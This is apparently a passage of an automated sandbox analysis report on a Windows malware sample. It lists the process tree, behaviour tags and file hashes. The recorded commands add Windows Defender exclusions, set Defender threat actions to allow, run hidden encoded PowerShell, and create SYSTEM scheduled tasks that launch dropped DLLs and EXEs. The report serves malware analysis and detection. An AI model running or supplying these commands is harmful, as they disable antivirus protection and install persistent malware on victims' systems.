\"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\jpnBSJXiivlTuFWLn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\jpnBSJXiivlTuFWLn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\KHXCMqRscXuschwP\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\KHXCMqRscXuschwP\" /t REG_DWORD /d 0 /reg:64;"
                                                                                                                            2⤵
                                                                                                                            • Drops file in System32 directory
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                            PID:4232
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aIWXmyCUdsxU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                              3⤵
                                                                                                                                PID:4356
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aIWXmyCUdsxU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                  4⤵
                                                                                                                                    PID:2920
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aIWXmyCUdsxU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                  3⤵
                                                                                                                                    PID:4384
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hFJcRoDcPVUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                    3⤵
                                                                                                                                      PID:4420
                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hFJcRoDcPVUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                      3⤵
                                                                                                                                        PID:2960
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mbdcdpwRlyTVC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                        3⤵
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        PID:3912
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mbdcdpwRlyTVC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                        3⤵
                                                                                                                                          PID:4952
                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qCWABpGGrLbOkqZJqUR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                          3⤵
                                                                                                                                            PID:1924
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qCWABpGGrLbOkqZJqUR" /t REG_DWORD /d 0 /reg:64
                                                                                                                                            3⤵
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            PID:1584
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uefnUeatU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                            3⤵
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            PID:3796
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uefnUeatU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                            3⤵
                                                                                                                                              PID:1852
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WSxuqkkUVHYAoNVB /t REG_DWORD /d 0 /reg:32
                                                                                                                                              3⤵
                                                                                                                                                PID:4352
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WSxuqkkUVHYAoNVB /t REG_DWORD /d 0 /reg:64
                                                                                                                                                3⤵
                                                                                                                                                  PID:4336
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                  3⤵
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:3280
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                  3⤵
                                                                                                                                                    PID:3148
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                    3⤵
                                                                                                                                                      PID:2036
                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                      3⤵
                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                      PID:3608
                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\jpnBSJXiivlTuFWLn /t REG_DWORD /d 0 /reg:32
                                                                                                                                                      3⤵
                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                      PID:2860
                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\jpnBSJXiivlTuFWLn /t REG_DWORD /d 0 /reg:64
                                                                                                                                                      3⤵
                                                                                                                                                        PID:4760
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\KHXCMqRscXuschwP /t REG_DWORD /d 0 /reg:32
                                                                                                                                                        3⤵
                                                                                                                                                          PID:3036
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\KHXCMqRscXuschwP /t REG_DWORD /d 0 /reg:64
                                                                                                                                                          3⤵
                                                                                                                                                            PID:4168
                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                          schtasks /CREATE /TN "gYylbEQgo" /SC once /ST 05:49:19 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                          2⤵
                                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                                          PID:3532
                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                          schtasks /run /I /tn "gYylbEQgo"
                                                                                                                                                          2⤵
                                                                                                                                                            PID:4756
                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                            schtasks /DELETE /F /TN "gYylbEQgo"
                                                                                                                                                            2⤵
                                                                                                                                                              PID:212
                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                              schtasks /CREATE /TN "MCkNfWwwkFVHHbIdP" /SC once /ST 15:54:01 /RU "SYSTEM" /TR "\"C:\Windows\Temp\KHXCMqRscXuschwP\LoGgAMTGgCqDRFz\qGeZEXC.exe\" y8 /TlomdiddW 385121 /S" /V1 /F
                                                                                                                                                              2⤵
                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:2860
                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                              schtasks /run /I /tn "MCkNfWwwkFVHHbIdP"
                                                                                                                                                              2⤵
                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                              PID:4168
                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1532 -s 668
                                                                                                                                                              2⤵
                                                                                                                                                              • Program crash
                                                                                                                                                              PID:1292
                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                            1⤵
                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                            PID:1640
                                                                                                                                                            • C:\Windows\system32\gpupdate.exe
                                                                                                                                                              "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                              2⤵
                                                                                                                                                                PID:2668
                                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                                              C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                                                              1⤵
                                                                                                                                                                PID:4148
                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:4952
                                                                                                                                                                • C:\Windows\system32\gpscript.exe
                                                                                                                                                                  gpscript.exe /RefreshSystemParam
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:868
                                                                                                                                                                  • C:\Windows\system32\gpscript.exe
                                                                                                                                                                    gpscript.exe /RefreshSystemParam
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:4872
                                                                                                                                                                    • C:\Windows\Temp\KHXCMqRscXuschwP\LoGgAMTGgCqDRFz\qGeZEXC.exe
                                                                                                                                                                      C:\Windows\Temp\KHXCMqRscXuschwP\LoGgAMTGgCqDRFz\qGeZEXC.exe y8 /TlomdiddW 385121 /S
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Checks computer location settings
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Drops Chrome extension
                                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                      PID:4916
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                        2⤵
                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                        PID:4720
                                                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                          forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                                                          3⤵
                                                                                                                                                                          • Indirect Command Execution
                                                                                                                                                                          PID:3368
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:3356
                                                                                                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                5⤵
                                                                                                                                                                                  PID:636
                                                                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                              forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                                                              3⤵
                                                                                                                                                                              • Indirect Command Execution
                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                              PID:644
                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                4⤵
                                                                                                                                                                                  PID:3184
                                                                                                                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                    5⤵
                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                    PID:3936
                                                                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                                                                3⤵
                                                                                                                                                                                • Indirect Command Execution
                                                                                                                                                                                PID:3696
                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                  4⤵
                                                                                                                                                                                    PID:1848
                                                                                                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                      5⤵
                                                                                                                                                                                        PID:4620
                                                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                                                                    3⤵
                                                                                                                                                                                    • Indirect Command Execution
                                                                                                                                                                                    PID:4488
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                      4⤵
                                                                                                                                                                                        PID:1060
                                                                                                                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                          5⤵
                                                                                                                                                                                            PID:732
                                                                                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                        3⤵
                                                                                                                                                                                        • Indirect Command Execution
                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                        PID:4512
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                          4⤵
                                                                                                                                                                                            PID:1852
                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                              5⤵
                                                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                                                              PID:316
                                                                                                                                                                                              • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                                                                                "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                6⤵
                                                                                                                                                                                                  PID:112
                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                          schtasks /DELETE /F /TN "btVOVxCLuTmPtbGSGJ"
                                                                                                                                                                                          2⤵
                                                                                                                                                                                            PID:3988
                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:3128
                                                                                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                • Indirect Command Execution
                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                PID:4532
                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                    PID:4364
                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                      powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                                                      PID:1316
                                                                                                                                                                                                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                          PID:444
                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\uefnUeatU\zGQduo.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "MlFTuaVtobDCEKa" /V1 /F
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                  PID:1100
                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                  schtasks /CREATE /TN "MlFTuaVtobDCEKa2" /F /xml "C:\Program Files (x86)\uefnUeatU\NFSghSI.xml" /RU "SYSTEM"
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                  PID:2840
                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                  schtasks /END /TN "MlFTuaVtobDCEKa"
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:468
                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                    schtasks /DELETE /F /TN "MlFTuaVtobDCEKa"
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                      PID:1692
                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                      schtasks /CREATE /TN "eRNrQMcTjOeGvn" /F /xml "C:\Program Files (x86)\aIWXmyCUdsxU2\JTGTXMJ.xml" /RU "SYSTEM"
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                      PID:3936
                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                      schtasks /CREATE /TN "ejnGUocggjkjC2" /F /xml "C:\ProgramData\WSxuqkkUVHYAoNVB\aCTjZgR.xml" /RU "SYSTEM"
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                      PID:4428
                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                      schtasks /CREATE /TN "LUxtALytgLrrMUlyO2" /F /xml "C:\Program Files (x86)\qCWABpGGrLbOkqZJqUR\gaFJIcp.xml" /RU "SYSTEM"
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                      PID:4260
                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                      schtasks /CREATE /TN "rmSXPZzEYaoPgsthlAU2" /F /xml "C:\Program Files (x86)\mbdcdpwRlyTVC\PYNclHb.xml" /RU "SYSTEM"
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                      PID:2712
                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                      schtasks /CREATE /TN "DrbmHeJgHvCNKwrLy" /SC once /ST 07:05:03 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\KHXCMqRscXuschwP\tLuykUCz\ioUSvWZ.dll\",#1 /IPdidshdt 385121" /V1 /F
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                      PID:3364
                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                      schtasks /run /I /tn "DrbmHeJgHvCNKwrLy"
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:4756
                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                        schtasks /DELETE /F /TN "MCkNfWwwkFVHHbIdP"
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:2072
                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 2244
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                          PID:3700
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1532 -ip 1532
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:1852
                                                                                                                                                                                                        • C:\Windows\system32\rundll32.EXE
                                                                                                                                                                                                          C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\KHXCMqRscXuschwP\tLuykUCz\ioUSvWZ.dll",#1 /IPdidshdt 385121
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                            PID:1824
                                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                              C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\KHXCMqRscXuschwP\tLuykUCz\ioUSvWZ.dll",#1 /IPdidshdt 385121
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                              • Blocklisted process makes network request
                                                                                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                              • Enumerates system info in registry
                                                                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                                                                              PID:3036
                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                schtasks /DELETE /F /TN "DrbmHeJgHvCNKwrLy"
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                  PID:4216
                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3620 -ip 3620
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:4504
                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3144 -ip 3144
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                  PID:3384
                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 4916 -ip 4916
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                    PID:2676

                                                                                                                                                                                                                  Network

                                                                                                                                                                                                                  MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                  Replay Monitor

                                                                                                                                                                                                                  Loading Replay Monitor...

                                                                                                                                                                                                                  Downloads

                                                                                                                                                                                                                  • C:\$RECYCLE.BIN\S-1-5-18\desktop.ini

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    129B

                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    a526b9e7c716b3489d8cc062fbce4005

                                                                                                                                                                                                                    SHA1

